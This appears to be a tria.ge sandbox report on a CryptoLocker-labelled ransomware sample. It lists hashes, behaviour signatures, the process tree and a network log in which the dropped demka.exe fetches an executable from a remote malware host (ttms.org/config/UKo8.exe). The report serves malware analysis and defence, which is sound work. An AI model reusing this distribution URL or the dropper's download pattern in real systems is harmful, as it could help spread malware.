Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

2024-04-28...er.exe

windows7-x64

9

2024-04-28...er.exe

windows10-2004-x64

9

Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    28/04/2024, 11:26 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2024-04-28_1c0ba3fecb4fce6c0e4ee9bc43e9fb5e_cryptolocker.exe

  • Size

    41KB

  • MD5

    1c0ba3fecb4fce6c0e4ee9bc43e9fb5e

  • SHA1

    f1e17181bc011eccd9dd743f25b4e08365df65c6

  • SHA256

    2e7f3b77a9ca84c90a8e849b92a9001342725a456df28b56b8a7dc4152936a0c

  • SHA512

    9b59eff7d9802bcb5aaad66db3e3fffda809b89ccd1aa2e13f8bc450b998c71afb6a61bbaa06b847bf6b82893d69d94f7abc10319b3f162a0cb3c1ed4e7ebab7

  • SSDEEP

    768:bAvJCYOOvbRPDEgXrNekd7l94i3py/yY/Jc:bAvJCF+RQgJeab4sy/lu

Score
9/10

Malware Config

Signatures

  • Detection of CryptoLocker Variants 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-04-28_1c0ba3fecb4fce6c0e4ee9bc43e9fb5e_cryptolocker.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-04-28_1c0ba3fecb4fce6c0e4ee9bc43e9fb5e_cryptolocker.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:2392
    • C:\Users\Admin\AppData\Local\Temp\demka.exe
      "C:\Users\Admin\AppData\Local\Temp\demka.exe"
      2⤵
      • Executes dropped EXE
      • Modifies system certificate store
      • Suspicious use of UnmapMainImage
      PID:3052

Network

  • flag-us
    DNS
    ttms.org
    demka.exe
    Remote address:
    8.8.8.8:53
    Request
    ttms.org
    IN A
    Response
    ttms.org
    IN A
    35.215.114.222
  • flag-us
    GET
    https://ttms.org/config/UKo8.exe
    demka.exe
    Remote address:
    35.215.114.222:443
    Request
    GET /config/UKo8.exe HTTP/1.1
    Accept: text/*, application/*
    User-Agent: Updates downloader
    Host: ttms.org
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sun, 28 Apr 2024 11:26:41 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    X-Httpd: 1
    Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
    X-Proxy-Cache: EXPIRED
    X-Proxy-Cache-Info: 0 NC:000000 UP:
  • 35.215.114.222:443
    https://ttms.org/config/UKo8.exe
    tls, http
    demka.exe
    3.1kB
     91.0kB
     55
    69

    HTTP Request

    GET https://ttms.org/config/UKo8.exe

    HTTP Response

    404
  • 8.8.8.8:53
    ttms.org
    dns
    demka.exe
    54 B
     70 B
     1
    1

    DNS Request

    ttms.org

    DNS Response

    35.215.114.222

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • \Users\Admin\AppData\Local\Temp\demka.exe
    Filesize

    42KB

    MD5

    95b28e317eb31757ee544a5537243611

    SHA1

    5f3a800b2923126d372e026e1b353c5cea2e0064

    SHA256

    25052e28e3d8c1e75c39029e580dd1eb07724d99f4a33a4e193cc92012e5d7c0

    SHA512

    a794915f6bfd3fc22bb5595d5b7bae909818d45e7e41adc5e456d5f9725c06adc7aa47a244ba44219c5c952ebd3aad912c9a49066bf9c8285890160480033611

    Download Submit

  • memory/2392-0-0x00000000003E0000-0x00000000003E6000-memory.dmp

    Filesize

    24KB

    Download

  • memory/2392-1-0x0000000000400000-0x0000000000406000-memory.dmp

    Filesize

    24KB

    Download

  • memory/2392-8-0x00000000003E0000-0x00000000003E6000-memory.dmp

    Filesize

    24KB

    Download

  • memory/3052-23-0x0000000000380000-0x0000000000386000-memory.dmp

    Filesize

    24KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.